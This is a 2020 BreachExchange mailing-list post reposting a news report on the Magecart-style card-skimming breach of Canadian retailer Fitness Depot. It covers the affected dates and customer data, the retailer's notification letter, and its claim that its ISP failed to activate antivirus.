[BreachExchange] Fitness Depot hit by data breach after ISP fails to 'activate the antivirus'

Destry Winant destry at riskbasedsecurity.com
Tue Jun 9 09:49:53 EDT 2020


Canadian retailer Fitness Depot announced customers that their
personal and financial information was stolen following a breach that
affected the company's e-commerce platform last month.

Fitness Depot is the largest specialty exercise equipment retailer in
Canada, with 40 stores nationwide and two in the United States, Texas,
in Dallas and Houston.

Signs of a Magecart attack

Based on the info in the breach notification letter the company sent
to all potentially impacted individuals, the attack has all the signs
of a textbook Magecart attack where the threat actors were able to
compromise Fitness Depot's online store and inject a malicious form
designed to harvest and exfiltrate customer information.

In such attacks, cybercrime groups known as Magecart groups hack
e-commerce stores and inject malicious JavaScript-based scripts into
their checkout pages as part of web skimming (aka e-skimming) attacks.

The attackers' end goal is to steal all the payment or personal
information submitted by the compromised sites' customers and to
collect it on remote servers under their control.

Digital skimming detection security firm Sansec spotted the payment
card skimmers injected in Fitness Depot's e-commerce platform between
April 2 and May 17, as shown by a public crawler detection report
shared with BleepingComputer by the company's CEO and founder Willem
de Groot.

Not all customers were affected

In a letter sent to affected customers, the company says that the
attackers may have accessed or stolen the information of clients "who
made purchases for delivery and or who made purchases for in-store
pick up at one of our retail locations," reads.

The information accessed or harvested by the attackers may have
included the impacted customers' name, address, email address,
telephone number, and credit card number.

The breach goes as far back as February 18, 2020, according to Fitness
Depot's data breach notification and it started with a malicious form
being injected within the online store.

"Once our customers where (sic) redirected to this form the customer
information was copied without the authorization or knowledge of
Fitness Depot," the company says. "This is how the personal
information was captured and stolen."

Only customers with home delivery were impacted between February 18
and April 27, while from April 28 and May 22 "any customer that
ordered product for Home delivery or ordered product for in-store
pick-up could have been potentially affected."

The ISP gets blamed for the breach

Fitness Depot blames its internet service provider (ISP) for the data
breach saying that "[b]ased on our preliminary findings it appears our
Internet Service Provider [ISP] neglected to activate the anti-virus
software on our account."

It is not yet known what Canadian fitness retailer refers to since
it's not an ISP's job to protect its customers' e-commerce platforms
with anti-malware solutions.

BleepingComputer has reached out to Fitness Depot for more details but
had not heard back at the time of this publication.

Additionally, while Fitness Depot said that "personal information was
captured and stolen," the company also says that it "has no knowledge
that any of our customer information was compromised in any manner."

Fitness Depot also advises customers to keep an eye out for identity
theft or fraud attempts by monitoring their free credit reports and
reviewing account statements.

Update June 8: Added information on credit card skimmer scripts found
on Fitness Depot's online store.

More information about the BreachExchange mailing list